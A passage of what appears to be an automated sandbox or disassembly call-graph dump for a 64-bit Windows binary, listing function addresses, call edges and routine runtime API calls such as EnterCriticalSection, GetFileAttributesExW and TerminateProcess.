7ff7d77f1010 7678->7680 7681 7ff7d77f551f 7679->7681 7680->6929 7682 7ff7d77f5544 7681->7682 7683 7ff7d77f553b 7681->7683 7684 7ff7d77f71bc 11 API calls 7682->7684 7685 7ff7d77f71bc 11 API calls 7683->7685 7686 7ff7d77f5549 7684->7686 7685->7670 7687 7ff7d77f5566 7686->7687 7688 7ff7d77f71bc 11 API calls 7686->7688 7689 7ff7d77f71bc 11 API calls 7687->7689 7690 7ff7d77f5553 7688->7690 7689->7670 7690->7687 7691 7ff7d77f5558 7690->7691 7692 7ff7d77f71dc 11 API calls 7691->7692 7692->7675 7710 7ff7d77f7218 7693->7710 7697 7ff7d77f8144 7696->7697 7698 7ff7d77f814e 7696->7698 7732 7ff7d77f7e64 7697->7732 7700 7ff7d77f808c 47 API calls 7698->7700 7701 7ff7d77f8176 7700->7701 7702 7ff7d77fb880 5 API calls 7701->7702 7704 7ff7d77f8186 7701->7704 7702->7704 7752 7ff7d77f7f10 7704->7752 7706 7ff7d77f7e64 49 API calls 7707 7ff7d77f81e2 7706->7707 7708 7ff7d77f8149 7707->7708 7709 7ff7d77f71dc 11 API calls 7707->7709 7708->7674 7709->7708 7731 7ff7d77fa734 EnterCriticalSection 7710->7731 7712 7ff7d77f7244 7713 7ff7d77f724c 7712->7713 7716 7ff7d77f726f 7712->7716 7714 7ff7d77f71bc 11 API calls 7713->7714 7715 7ff7d77f7251 7714->7715 7717 7ff7d77f7080 47 API calls 7715->7717 7718 7ff7d77f730c 73 API calls 7716->7718 7719 7ff7d77f725d 7717->7719 7721 7ff7d77f7277 7718->7721 7720 7ff7d77fa788 LeaveCriticalSection 7719->7720 7722 7ff7d77f54bb 7720->7722 7721->7719 7723 7ff7d77f72b5 7721->7723 7724 7ff7d77f72a5 7721->7724 7722->7663 7722->7664 7726 7ff7d77f6a88 47 API calls 7723->7726 7725 7ff7d77f71bc 11 API calls 7724->7725 7725->7719 7727 7ff7d77f72c3 7726->7727 7727->7719 7728 7ff7d77f72f6 7727->7728 7729 7ff7d77f70a0 17 API calls 7728->7729 7730 7ff7d77f730a 7729->7730 7733 7ff7d77f7e80 7732->7733 7734 7ff7d77f7e9d 7732->7734 7774 7ff7d77f719c 7733->7774 7734->7733 7736 7ff7d77f7ea5 GetFileAttributesExW 7734->7736 7738 7ff7d77f7eb6 GetLastError 7736->7738 7742 7ff7d77f7ecc 7736->7742 7740 7ff7d77f7130 11 API calls 7738->7740 7739 7ff7d77f71bc 11 API calls 7741 7ff7d77f7e8d 7739->7741 7751 7ff7d77f7ec3 7740->7751 7743 7ff7d77f7080 47 API calls 7741->7743 7746 7ff7d77f719c 11 API calls 7742->7746 7747 7ff7d77f7e99 7742->7747 7743->7747 7744 7ff7d77f1030 8 API calls 7748 7ff7d77f7f08 7744->7748 7745 7ff7d77f71bc 11 API calls 7745->7747 7749 7ff7d77f7ee6 7746->7749 7747->7744 7748->7708 7750 7ff7d77f71bc 11 API calls 7749->7750 7750->7751 7751->7745 7753 7ff7d77f7f5e 7752->7753 7754 7ff7d77f7f3a 7752->7754 7755 7ff7d77f7f63 7753->7755 7756 7ff7d77f7fb8 7753->7756 7758 7ff7d77f71dc 11 API calls 7754->7758 7763 7ff7d77f7f49 7754->7763 7759 7ff7d77f7f78 7755->7759 7760 7ff7d77f71dc 11 API calls 7755->7760 7755->7763 7757 7ff7d77fa024 MultiByteToWideChar 7756->7757 7766 7ff7d77f7fd4 7757->7766 7758->7763 7761 7ff7d77fb070 12 API calls 7759->7761 7760->7759 7761->7763 7762 7ff7d77f7fdb GetLastError 7765 7ff7d77f7130 11 API calls 7762->7765 7763->7706 7763->7707 7764 7ff7d77f8016 7764->7763 7768 7ff7d77fa024 MultiByteToWideChar 7764->7768 7769 7ff7d77f7fe8 7765->7769 7766->7762 7766->7764 7767 7ff7d77f8009 7766->7767 7771 7ff7d77f71dc 11 API calls 7766->7771 7772 7ff7d77fb070 12 API calls 7767->7772 7773 7ff7d77f805a 7768->7773 7770 7ff7d77f71bc 11 API calls 7769->7770 7770->7763 7771->7767 7772->7764 7773->7762 7773->7763 7775 7ff7d77f8708 11 API calls 7774->7775 7776 7ff7d77f71a5 7775->7776 7776->7739 7778 7ff7d77f8590 47 API calls 7777->7778 7780 7ff7d77f6a49 7778->7780 7779 7ff7d77f6ae8 47 API calls 7781 7ff7d77f6a69 7779->7781 7780->7779 8293 7ff7d78010b0 8294 7ff7d78010e8 8293->8294 8295 7ff7d7801114 8294->8295 8297 7ff7d77f2b9c 8294->8297 8304 7ff7d77f21bc 8297->8304 8300 7ff7d77f21bc 56 API calls 8301 7ff7d77f2bd3 8300->8301 8302 7ff7d77f21bc 56 API calls 8301->8302 8303 7ff7d77f2bdc 8302->8303 8303->8295 8310 7ff7d77f21d8 8304->8310 8307 7ff7d77f21ca 8307->8300 8308 7ff7d77f6ae8 47 API calls 8309 7ff7d77f21d4 8308->8309 8311 7ff7d77f21c5 8310->8311 8312 7ff7d77f21f7 GetLastError 8310->8312 8311->8307 8311->8308 8322 7ff7d77f2564 8312->8322 8323 7ff7d77f2384 5 API calls 8322->8323 8324 7ff7d77f258b TlsGetValue 8323->8324 8560 7ff7d7802030 8561 7ff7d77f21bc 56 API calls 8560->8561 8562 7ff7d780203e 8561->8562 8563 7ff7d7802049 8562->8563 8564 7ff7d77f21bc 56 API calls 8562->8564 8564->8563 8653 7ff7d77fbbb0 8654 7ff7d77fbbba 8653->8654 8655 7ff7d77fbbe9 8653->8655 8654->8655 8656 7ff7d77fbbcf FreeLibrary 8654->8656 8656->8654 8657 7ff7d77fdfb0 8658 7ff7d77f9c60 68 API calls 8657->8658 8659 7ff7d77fdfb9 8658->8659 8326 7ff7d77f12b0 8329 7ff7d77f17a0 8326->8329 8330 7ff7d77f17c3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8329->8330 8331 7ff7d77f12b9 8329->8331 8330->8331 8848 7ff7d77f6330 GetCommandLineA GetCommandLineW 8849 7ff7d7801140 8859 7ff7d77f1d10 8849->8859 8851 7ff7d7801168 8853 7ff7d77f21bc 56 API calls 8854 7ff7d7801178 8853->8854 8855 7ff7d77f21bc 56 API calls 8854->8855 8856 7ff7d7801181 8855->8856 8857 7ff7d77f6a40 47 API calls 8856->8857 8858 7ff7d780118a 8857->8858 8862 7ff7d77f1d40 8859->8862 8860 7ff7d77f1e41 8860->8851 8860->8853 8861 7ff7d77f1e04 RtlUnwindEx 8861->8862 8862->8860 8862->8861 8660 7ff7d78003b8 8661 7ff7d78003cf 8660->8661 8662 7ff7d78003c9 CloseHandle 8660->8662 8662->8661 8863 7ff7d77f3950 8864 7ff7d77f397d 8863->8864 8865 7ff7d77f21bc 56 API calls 8864->8865 8868 7ff7d77f3982 8865->8868 8866 7ff7d77f39dc 8870 7ff7d77f3a57 8866->8870 8873 7ff7d77f3a35 8866->8873 8874 7ff7d77f39fe 8866->8874 8883 7ff7d77f3a30 8866->8883 8867 7ff7d77f3a6a 8877 7ff7d77f3a89 8867->8877 8919 7ff7d77f2b44 8867->8919 8868->8866 8868->8867 8868->8883 8869 7ff7d77f3ad8 8869->8883 8925 7ff7d77f30d0 8869->8925 8910 7ff7d77f2748 8870->8910 8873->8870 8876 7ff7d77f3a0d 8873->8876 8886 7ff7d77f2cd4 8874->8886 8879 7ff7d77f3b81 8876->8879 8881 7ff7d77f3a1f 8876->8881 8877->8869 8877->8883 8922 7ff7d77f2b58 8877->8922 8882 7ff7d77f6ae8 47 API calls 8879->8882 8891 7ff7d77f3ee8 8881->8891 8884 7ff7d77f3b86 8882->8884 8887 7ff7d77f2ce2 8886->8887 8888 7ff7d77f6ae8 47 API calls 8887->8888 8890 7ff7d77f2cf3 8887->8890 8889 7ff7d77f2d39 8888->8889 8890->8876 8892 7ff7d77f2b44 56 API calls 8891->8892 8893 7ff7d77f3f17 8892->8893 8987 7ff7d77f2c30 8893->8987 8896 7ff7d77f21bc 56 API calls 8908 7ff7d77f3f34 8896->8908 8897 7ff7d77f402b 8898 7ff7d77f21bc 56 API calls 8897->8898 8900 7ff7d77f4030 8898->8900 8899 7ff7d77f4066 8901 7ff7d77f6ae8 47 API calls 8899->8901 8902 7ff7d77f403b 8900->8902 8904 7ff7d77f21bc 56 API calls 8900->8904 8901->8902 8903 7ff7d77f4048 8902->8903 8905 7ff7d77f6ae8 47 API calls 8902->8905 8903->8883 8904->8902 8906 7ff7d77f4071 8905->8906 8907 7ff7d77f2b44 56 API calls 8907->8908 8908->8897 8908->8899 8908->8907 8909 7ff7d77f2b6c 56 API calls 8908->8909 8909->8908 8991 7ff7d77f27ac 8910->8991 8917 7ff7d77f3ee8 56 API calls 8918 7ff7d77f279c 8917->8918 8918->8883 8920 7ff7d77f21bc 56 API calls 8919->8920 8921 7ff7d77f2b4d 8920->8921 8921->8877 8923 7ff7d77f21bc 56 API calls 8922->8923 8924 7ff7d77f2b61 8923->8924 8924->8869 9005 7ff7d77f4074 8925->9005 8927 7ff7d77f6ae8 47 API calls 8929 7ff7d77f359d 8927->8929 8928 7ff7d77f3216 8930 7ff7d77f34e8 8928->8930 8932 7ff7d77f324e 8928->8932 8931 7ff7d77f34e6 8930->8931 8967 7ff7d77f3597 8930->8967 9068 7ff7d77f35a0 8930->9068 8934 7ff7d77f21bc 56 API calls 8931->8934 8935 7ff7d77f3415 8932->8935 9033 7ff7d77f287c 8932->9033 8938 7ff7d77f352a 8934->8938 8935->8931 8943 7ff7d77f3436 8935->8943 8945 7ff7d77f2b44 56 API calls 8935->8945 8936 7ff7d77f21bc 56 API calls 8941 7ff7d77f317d 8936->8941 8939 7ff7d77f3531 8938->8939 8938->8967 8942 7ff7d77f1030 8 API calls 8939->8942 8941->8939 8946 7ff7d77f21bc 56 API calls 8941->8946 8944 7ff7d77f353d 8942->8944 8943->8931 8949 7ff7d77f3458 8943->8949 9060 7ff7d77f271c 8943->9060 8944->8883 8945->8943 8948 7ff7d77f318d 8946->8948 8950 7ff7d77f21bc 56 API calls 8948->8950 8949->8931 8951 7ff7d77f346e 8949->8951 8952 7ff7d77f357a 8949->8952 8953 7ff7d77f3196 8950->8953 8955 7ff7d77f3479 8951->8955 8958 7ff7d77f2b44 56 API calls 8951->8958 8956 7ff7d77f21bc 56 API calls 8952->8956 9017 7ff7d77f2b84 8953->9017 8961 7ff7d77f410c 56 API calls 8955->8961 8959 7ff7d77f3580 8956->8959 8958->8955 8960 7ff7d77f21bc 56 API calls 8959->8960 8962 7ff7d77f3589 8960->8962 8963 7ff7d77f3490 8961->8963 8965 7ff7d77f6a40 47 API calls 8962->8965 8963->8931 8968 7ff7d77f27ac 48 API calls 8963->8968 8964 7ff7d77f21bc 56 API calls 8966 7ff7d77f31d8 8964->8966 8965->8967 8966->8928 8971 7ff7d77f21bc 56 API calls 8966->8971 8967->8927 8970 7ff7d77f34aa 8968->8970 8969 7ff7d77f2b58 56 API calls 8977 7ff7d77f327d 8969->8977 9065 7ff7d77f29b0 RtlUnwindEx 8970->9065 8973 7ff7d77f31e4 8971->8973 8975 7ff7d77f21bc 56 API calls 8973->8975 8976 7ff7d77f31ed 8975->8976 9020 7ff7d77f410c 8976->9020 8977->8935 8977->8969 9039 7ff7d77f3810 8977->9039 9053 7ff7d77f2ffc 8977->9053 8981 7ff7d77f3201 9029 7ff7d77f41fc 8981->9029 8983 7ff7d77f3574 8984 7ff7d77f6a40 47 API calls 8983->8984 8984->8952 8985 7ff7d77f3209 8985->8983 9086 7ff7d77f43f8 8985->9086 8988 7ff7d77f2c52 8987->8988 8989 7ff7d77f2c47 8987->8989 8988->8896 8990 7ff7d77f2cd4 47 API calls 8989->8990 8990->8988 8992 7ff7d77f2ccc 47 API calls 8991->8992 8993 7ff7d77f27da 8992->8993 8994 7ff7d77f2804 RtlLookupFunctionEntry 8993->8994 8995 7ff7d77f2767 8993->8995 8994->8993 8996 7ff7d77f2ccc 8995->8996 8997 7ff7d77f2cd4 8996->8997 8998 7ff7d77f6ae8 47 API calls 8997->8998 8999 7ff7d77f2775 8997->8999 9000 7ff7d77f2d39 8998->9000 9001 7ff7d77f26b8 8999->9001 9002 7ff7d77f2703 9001->9002 9003 7ff7d77f26d8 9001->9003 9002->8917 9003->9002 9004 7ff7d77f21bc 56 API calls 9003->9004 9004->9003 9006 7ff7d77f2ccc 47 API calls 9005->9006 9007 7ff7d77f4099 9006->9007 9008 7ff7d77f27ac 48 API calls 9007->9008 9009 7ff7d77f40ae 9008->9009 9091 7ff7d77f2c58 9009->9091 9012 7ff7d77f40e3 9014 7ff7d77f2c58 48 API calls 9012->9014 9013 7ff7d77f40c0 9094 7ff7d77f2c90 9013->9094 9016 7ff7d77f3131 9014->9016 9016->8928 9016->8936 9016->8967 9018 7ff7d77f21bc 56 API calls 9017->9018 9019 7ff7d77f2b92 9018->9019 9019->8964 9019->8967 9021 7ff7d77f41f3 9020->9021 9028 7ff7d77f4137 9020->9028 9022 7ff7d77f6ae8 47 API calls 9021->9022 9024 7ff7d77f41f8 9022->9024 9023 7ff7d77f31fd 9023->8928 9023->8981 9025 7ff7d77f2b58 56 API calls 9025->9028 9026 7ff7d77f2b44 56 API calls 9026->9028 9027 7ff7d77f3810 56 API calls 9027->9028 9028->9023 9028->9025 9028->9026 9028->9027 9030 7ff7d77f4269 9029->9030 9032 7ff7d77f4219 9029->9032 9030->8985 9031 7ff7d77f2b44 56 API calls 9031->9032 9032->9030 9032->9031 9034 7ff7d77f2ccc 47 API calls 9033->9034 9035 7ff7d77f28ba 9034->9035 9036 7ff7d77f6ae8 47 API calls 9035->9036 9038 7ff7d77f28c8 9035->9038 9037 7ff7d77f29ac 9036->9037 9038->8977 9040 7ff7d77f383d 9039->9040 9052 7ff7d77f38cc 9039->9052 9041 7ff7d77f2b44 56 API calls 9040->9041 9042 7ff7d77f3846 9041->9042 9043 7ff7d77f2b44 56 API calls 9042->9043 9044 7ff7d77f385f 9042->9044 9042->9052 9043->9044 9045 7ff7d77f388b 9044->9045 9046 7ff7d77f2b44 56 API calls 9044->9046 9044->9052 9047 7ff7d77f2b58 56 API calls 9045->9047 9046->9045 9048 7ff7d77f389f 9047->9048 9049 7ff7d77f2b44 56 API calls 9048->9049 9050 7ff7d77f38b8 9048->9050 9048->9052 9049->9050 9051 7ff7d77f2b58 56 API calls 9050->9051 9051->9052 9052->8977 9054 7ff7d77f27ac 48 API calls 9053->9054 9055 7ff7d77f3039 9054->9055 9056 7ff7d77f2b44 56 API calls 9055->9056 9057 7ff7d77f3071 9056->9057 9058 7ff7d77f29b0 9 API calls 9057->9058 9059 7ff7d77f30b5 9058->9059 9059->8977 9061 7ff7d77f2ccc 47 API calls 9060->9061 9062 7ff7d77f2730 9061->9062 9063 7ff7d77f26b8 56 API calls 9062->9063 9064 7ff7d77f273a 9063->9064 9064->8949 9066 7ff7d77f1030 8 API calls 9065->9066 9067 7ff7d77f2aaa 9066->9067 9067->8931 9069 7ff7d77f37ec 9068->9069 9070 7ff7d77f35d9 9068->9070 9069->8931 9071 7ff7d77f21bc 56 API calls 9070->9071 9072 7ff7d77f35de 9071->9072 9073 7ff7d77f35fd EncodePointer 9072->9073 9074 7ff7d77f3650 9072->9074 9077 7ff7d77f21bc 56 API calls 9073->9077 9074->9069 9075 7ff7d77f3670 9074->9075 9076 7ff7d77f3807 9074->9076 9078 7ff7d77f287c 47 API calls 9075->9078 9079 7ff7d77f6ae8 47 API calls 9076->9079 9081 7ff7d77f360d 9077->9081 9085 7ff7d77f3692 9078->9085 9080 7ff7d77f380c 9079->9080 9081->9074 9097 7ff7d77f2664 9081->9097 9083 7ff7d77f2b44 56 API calls 9083->9085 9084 7ff7d77f2ffc 58 API calls 9084->9085 9085->9069 9085->9083 9085->9084 9087 7ff7d77f4417 9086->9087 9088 7ff7d77f4462 RaiseException 9087->9088 9089 7ff7d77f4440 RtlPcToFileHeader 9087->9089 9088->8983 9090 7ff7d77f4458 9089->9090 9090->9088 9092 7ff7d77f27ac 48 API calls 9091->9092 9093 7ff7d77f2c6b 9092->9093 9093->9012 9093->9013 9095 7ff7d77f27ac 48 API calls 9094->9095 9096 7ff7d77f2caa 9095->9096 9096->9016 9098 7ff7d77f21bc 56 API calls 9097->9098 9099 7ff7d77f2690 9098->9099 9099->9074 8332 7ff7d7801ecc 8333 7ff7d77f21bc 56 API calls 8332->8333 8334 7ff7d7801ee4 8333->8334 8335 7ff7d77f21bc 56 API calls 8334->8335 8336 7ff7d7801eff 8335->8336 8337 7ff7d77f21bc 56 API calls 8336->8337 8338 7ff7d7801f13 8337->8338 8339 7ff7d77f21bc 56 API calls 8338->8339 8340 7ff7d7801f55 8339->8340 8663 7ff7d77ffbcb 8664 7ff7d77ffe70 8663->8664 8665 7ff7d77ffc0b 8663->8665 8668 7ff7d7800980 20 API calls 8664->8668 8670 7ff7d77ffe66 8664->8670 8665->8664 8666 7ff7d77ffe52 8665->8666 8669 7ff7d77ffc3f 8665->8669 8671 7ff7d7800980 8666->8671 8668->8670 8674 7ff7d78009a0 8671->8674 8675 7ff7d78009ba 8674->8675 8676 7ff7d780099b 8675->8676 8678 7ff7d78007e0 8675->8678 8676->8670 8679 7ff7d7800820 8678->8679 8681 7ff7d780088c 8679->8681 8689 7ff7d7800aa0 8679->8689 8682 7ff7d78008c9 8681->8682 8683 7ff7d7800899 8681->8683 8696 7ff7d7800dd0 8682->8696 8692 7ff7d78006bc 8683->8692 8686 7ff7d78008c7 8687 7ff7d77f1030 8 API calls 8686->8687 8688 7ff7d78008f1 8687->8688 8688->8676 8702 7ff7d7800ac8 8689->8702 8693 7ff7d7800700 8692->8693 8694 7ff7d7800715 8693->8694 8695 7ff7d7800dd0 11 API calls 8693->8695 8694->8686 8695->8694 8697 7ff7d7800df0 8696->8697 8698 7ff7d7800dd9 8696->8698 8699 7ff7d77f71bc 11 API calls 8697->8699 8700 7ff7d7800de8 8698->8700 8701 7ff7d77f71bc 11 API calls 8698->8701 8699->8700 8700->8686 8701->8700 8703 7ff7d7800b07 8702->8703 8704 7ff7d7800d1c RaiseException 8703->8704 8705 7ff7d7800ac2 8704->8705 8705->8681 9109 7ff7d7802148 9110 7ff7d7802161 9109->9110 9111 7ff7d7802157 9109->9111 9113 7ff7d77fa788 LeaveCriticalSection 9111->9113 8706 7ff7d77f63e4 8709 7ff7d77f6368 8706->8709 8716 7ff7d77fa734 EnterCriticalSection 8709->8716 8565 7ff7d77f1262 8566 7ff7d77f1a18 GetModuleHandleW 8565->8566 8567 7ff7d77f1269 8566->8567 8341 7ff7d77fd6e0 8342 7ff7d77fd6ff 8341->8342 8343 7ff7d77fd778 8342->8343 8346 7ff7d77fd70f 8342->8346 8349 7ff7d77f13cc 8343->8349 8347 7ff7d77f1030 8 API calls 8346->8347 8348 7ff7d77fd76e 8347->8348 8352 7ff7d77f13e0 IsProcessorFeaturePresent 8349->8352 8353 7ff7d77f13f7 8352->8353 8358 7ff7d77f147c RtlCaptureContext RtlLookupFunctionEntry 8353->8358 8359 7ff7d77f140b 8358->8359 8360 7ff7d77f14ac RtlVirtualUnwind 8358->8360 8361 7ff7d77f12c4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8359->8361 8360->8359 8717 7ff7d77fd1e0 8718 7ff7d77fd20d 8717->8718 8719 7ff7d77f71bc 11 API calls 8718->8719 8724 7ff7d77fd222 8718->8724 8720 7ff7d77fd217 8719->8720 8721 7ff7d77f7080 47 API calls 8720->8721 8721->8724 8722 7ff7d77f1030 8 API calls 8723 7ff7d77fd5e0 8722->8723 8724->8722 7782 7ff7d77f60d9 7783 7ff7d77f6a40 47 API calls 7782->7783 7784 7ff7d77f60de 7783->7784 7785 7ff7d77f6105 GetModuleHandleW 7784->7785 7786 7ff7d77f614f 7784->7786 7785->7786 7787 7ff7d77f6112 7785->7787 7794 7ff7d77f5fdc 7786->7794 7787->7786 7808 7ff7d77f6200 GetModuleHandleExW 7787->7808 7790 7ff7d77f6192 7814 7ff7d77fa734 EnterCriticalSection 7794->7814 7796 7ff7d77f5ff8 7797 7ff7d77f6014 11 API calls 7796->7797 7798 7ff7d77f6001 7797->7798 7799 7ff7d77fa788 LeaveCriticalSection 7798->7799 7800 7ff7d77f6009 7799->7800 7800->7790 7801 7ff7d77f61a8 7800->7801 7815 7ff7d77f61dc 7801->7815 7803 7ff7d77f61b5 7804 7ff7d77f61b9 GetCurrentProcess TerminateProcess 7803->7804 7805 7ff7d77f61ca 7803->7805 7804->7805 7806 7ff7d77f6200 3 API calls 7805->7806 7807 7ff7d77f61d1 ExitProcess 7806->7807 7809 7ff7d77f6234 GetProcAddress 7808->7809 7810 7ff7d77f625d 7808->7810 7811 7ff7d77f6246 7809->7811 7812 7ff7d77f6262 FreeLibrary 7810->7812 7813 7ff7d77f6269 7810->7813 7811->7810 7812->7813 7813->7786 7818 7ff7d77fa7d8 7815->7818 7817 7ff7d77f61e5 7817->7803 7819 7ff7d77fa7e9 7818->7819 7820 7ff7d77fa7f7 7819->7820 7822 7ff7d77fb828 7819->7822 7820->7817 7823 7ff7d77fb66c 5 API calls 7822->7823 7824 7ff7d77fb850 7823->7824 7824->7820 9114 7ff7d77f6958 9115 7ff7d77f6989 9114->9115 9116 7ff7d77f6971 9114->9116 9116->9115 9117 7ff7d77f71dc 11 API calls 9116->9117 9117->9115 9118 7ff7d77f3d72 9119 7ff7d77f21bc 56 API calls 9118->9119 9121 7ff7d77f3d7f 9119->9121 9120 7ff7d77f3dc3 RaiseException 9122 7ff7d77f3dea 9120->9122 9121->9120 9123 7ff7d77f2af0 56 API calls 9122->9123 9127 7ff7d77f3df2 9123->9127 9124 7ff7d77f3e1b 9125 7ff7d77f21bc 56 API calls 9124->9125 9126 7ff7d77f3e2e 9125->9126 9128 7ff7d77f21bc 56 API calls 9126->9128 9127->9124 9130 7ff7d77f2008 56 API calls 9127->9130 9129 7ff7d77f3e37 9128->9129 9130->9124 9131 7ff7d7801f6f 9134 7ff7d77f3e64 9131->9134 9135 7ff7d77f3ecb 9134->9135 9136 7ff7d77f3e7e 9134->9136 9136->9135 9137 7ff7d77f21bc 56 API calls 9136->9137 9137->9135 8362 7ff7d77fa6ec 8363 7ff7d77fa6f4 8362->8363 8365 7ff7d77fa725 8363->8365 8366 7ff7d77fa721 8363->8366 8368 7ff7d77fb9d0 8363->8368 8373 7ff7d77fa750 8365->8373 8369 7ff7d77fb66c 5 API calls 8368->8369 8370 7ff7d77fba06 8369->8370 8371 7ff7d77fba25 InitializeCriticalSectionAndSpinCount 8370->8371 8372 7ff7d77fba0b 8370->8372 8371->8372 8372->8363 8374 7ff7d77fa77b 8373->8374 8375 7ff7d77fa77f 8374->8375 8376 7ff7d77fa75e DeleteCriticalSection 8374->8376 8375->8366 8376->8374 8568 7ff7d77fc46c 8569 7ff7d77fc496 8568->8569 8570 7ff7d77f88f0 11 API calls 8569->8570 8571 7ff7d77fc4b5 8570->8571 8572 7ff7d77f71dc 11 API calls 8571->8572 8573 7ff7d77fc4c3 8572->8573 8574 7ff7d77f88f0 11 API calls 8573->8574 8578 7ff7d77fc4ed 8573->8578 8575 7ff7d77fc4df 8574->8575 8577 7ff7d77f71dc 11 API calls 8575->8577 8576 7ff7d77fb9d0 6 API calls 8576->8578 8577->8578 8578->8576 8579 7ff7d77fc4f6 8578->8579 8377 7ff7d77f20ec 8378 7ff7d77f6a40 47 API calls 8377->8378 8379 7ff7d77f20f5 8378->8379 8728 7ff7d77f3bec 8731 7ff7d77f4340 8728->8731 8730 7ff7d77f3c15 8732 7ff7d77f4361 8731->8732 8733 7ff7d77f4396 8731->8733 8732->8733 8734 7ff7d77f6a88 47 API calls 8732->8734 8733->8730 8734->8733 8735 7ff7d77f5403 8736 7ff7d77f5488 8735->8736 8737 7ff7d77f54bb 8736->8737 8738 7ff7d77f7398 73 API calls 8736->8738 8739 7ff7d77f54c4 8737->8739 8740 7ff7d77f55b2 8737->8740 8738->8737 8742 7ff7d77f54f3 8739->8742 8743 7ff7d77f54c9 8739->8743 8741 7ff7d77f70a0 17 API calls 8740->8741 8744 7ff7d77f55c6 8741->8744 8748 7ff7d77f71bc 11 API calls 8742->8748 8761 7ff7d77f5540 8742->8761 8745 7ff7d77f54d6 8743->8745 8743->8761 8746 7ff7d77f8128 57 API calls 8745->8746 8749 7ff7d77f54dd 8746->8749 8747 7ff7d77f71dc 11 API calls 8768 7ff7d77f54e8 8747->8768 8750 7ff7d77f5518 8748->8750 8751 7ff7d77f71dc 11 API calls 8749->8751 8753 7ff7d77f71bc 11 API calls 8750->8753 8751->8768 8752 7ff7d77f1030 8 API calls 8754 7ff7d77f55a0 8752->8754 8755 7ff7d77f551f 8753->8755 8756 7ff7d77f5544 8755->8756 8757 7ff7d77f553b 8755->8757 8758 7ff7d77f71bc 11 API calls 8756->8758 8759 7ff7d77f71bc 11 API calls 8757->8759 8760 7ff7d77f5549 8758->8760 8759->8761 8762 7ff7d77f5566 8760->8762 8763 7ff7d77f71bc 11 API calls 8760->8763 8761->8747 8764 7ff7d77f71bc 11 API calls 8762->8764 8765 7ff7d77f5553 8763->8765 8764->8761 8765->8762 8766 7ff7d77f5558 8765->8766 8767 7ff7d77f71dc 11 API calls 8766->8767 8767->8768 8768->8752 8769 7ff7d77f4004 8781 7ff7d77f3f37 8769->8781 8770 7ff7d77f402b 8771 7ff7d77f21bc 56 API calls 8770->8771 8773 7ff7d77f4030 8771->8773 8772 7ff7d77f4066 8774 7ff7d77f6ae8 47 API calls 8772->8774 8776 7ff7d77f403b 8773->8776 8777 7ff7d77f21bc 56 API calls 8773->8777 8774->8776 8775 7ff7d77f4048 8776->8775 8778 7ff7d77f6ae8 47 API calls 8776->8778 8777->8776 8779 7ff7d77f4071 8778->8779 8780 7ff7d77f2b44 56 API calls 8780->8781 8781->8770 8781->8772 8781->8780 8783 7ff7d77f2b6c 8781->8783 8784 7ff7d77f21bc 56 API calls 8783->8784 8785 7ff7d77f2b7a 8784->8785 8785->8781 8786 7ff7d7801e00 8789 7ff7d77f55c8 8786->8789 8790 7ff7d77f8708 11 API calls 8789->8790 8791 7ff7d77f55e6 8790->8791 8380 7ff7d77f6900 8383 7ff7d77f5eb4 8380->8383 8390 7ff7d77f5e40 8383->8390 8388 7ff7d77f5d1c 11 API calls 8389 7ff7d77f5ee7 8388->8389 8391 7ff7d77f5e55 8390->8391 8392 7ff7d77f5e50 8390->8392 8394 7ff7d77f5e5c 8391->8394 8393 7ff7d77f5d1c 11 API calls 8392->8393 8393->8391 8395 7ff7d77f5e71 8394->8395 8396 7ff7d77f5e6c 8394->8396 8395->8388 8397 7ff7d77f5d1c 11 API calls 8396->8397 8397->8395 8398 7ff7d77f7b00 8399 7ff7d77f7b40 8398->8399 8400 7ff7d77f7b59 8398->8400 8401 7ff7d77f71bc 11 API calls 8399->8401 8400->8399 8404 7ff7d77f7b70 8400->8404 8402 7ff7d77f7b45 8401->8402 8403 7ff7d77f7080 47 API calls 8402->8403 8410 7ff7d77f7b50 8403->8410 8405 7ff7d77f71bc 11 API calls 8404->8405 8408 7ff7d77f7b75 8405->8408 8406 7ff7d77f1030 8 API calls 8407 7ff7d77f7e1e 8406->8407 8409 7ff7d77f71bc 11 API calls 8408->8409 8408->8410 8411 7ff7d77f7bb3 8409->8411 8410->8406 8411->8410 8412 7ff7d77f7398 73 API calls 8411->8412 8413 7ff7d77f7c10 8412->8413 8414 7ff7d77f7c14 8413->8414 8416 7ff7d77f7c1d 8413->8416 8417 7ff7d77f88f0 11 API calls 8413->8417 8415 7ff7d77f7e2f 8414->8415 8414->8416 8418 7ff7d77f70a0 17 API calls 8415->8418 8420 7ff7d77f71dc 11 API calls 8416->8420 8433 7ff7d77f7c3e 8417->8433 8419 7ff7d77f7e43 8418->8419 8422 7ff7d77f70a0 17 API calls 8419->8422 8420->8410 8421 7ff7d77f7c46 8424 7ff7d77f71dc 11 API calls 8421->8424 8425 7ff7d77f7e58 8422->8425 8424->8416 8426 7ff7d77fc990 47 API calls 8426->8433 8427 7ff7d77f7dc9 8429 7ff7d77f71dc 11 API calls 8427->8429 8428 7ff7d77f71bc 11 API calls 8428->8433 8430 7ff7d77f7dd1 8429->8430 8431 7ff7d77f71dc 11 API calls 8430->8431 8431->8410 8432 7ff7d77f719c 11 API calls 8432->8433 8433->8415 8433->8419 8433->8421 8433->8426 8433->8427 8433->8428 8433->8432 8434 7ff7d77fd110 8433->8434 8435 7ff7d77fd12d 8434->8435 8436 7ff7d77fd11d 8434->8436 8435->8436 8440 7ff7d77fd13a 8435->8440 8437 7ff7d77f71bc 11 API calls 8436->8437 8438 7ff7d77fd122 8437->8438 8438->8433 8438->8438 8439 7ff7d77f71bc 11 API calls 8439->8438 8440->8438 8440->8439 9138 7ff7d77fad7c 9139 7ff7d77fad88 9138->9139 9141 7ff7d77fadaf 9139->9141 9142 7ff7d77fa8b0 9139->9142 9143 7ff7d77fa8b5 9142->9143 9144 7ff7d77fa8f0 9142->9144 9145 7ff7d77fa8d6 DeleteCriticalSection 9143->9145 9146 7ff7d77fa8e8 9143->9146 9144->9139 9145->9145 9145->9146 9147 7ff7d77f71dc 11 API calls 9146->9147 9147->9144 8580 7ff7d77f1a7c 8581 7ff7d77f1ab0 8580->8581 8582 7ff7d77f1a94 8580->8582 8582->8581 8589 7ff7d77f20c4 8582->8589 8587 7ff7d77f6a40 47 API calls 8588 7ff7d77f1ad6 8587->8588 8590 7ff7d77f21bc 56 API calls 8589->8590 8591 7ff7d77f1ac2 8590->8591 8592 7ff7d77f20d8 8591->8592 8593 7ff7d77f21bc 56 API calls 8592->8593 8594 7ff7d77f1ace 8593->8594 8594->8587 7825 7ff7d77f73f8 7826 7ff7d77f745b 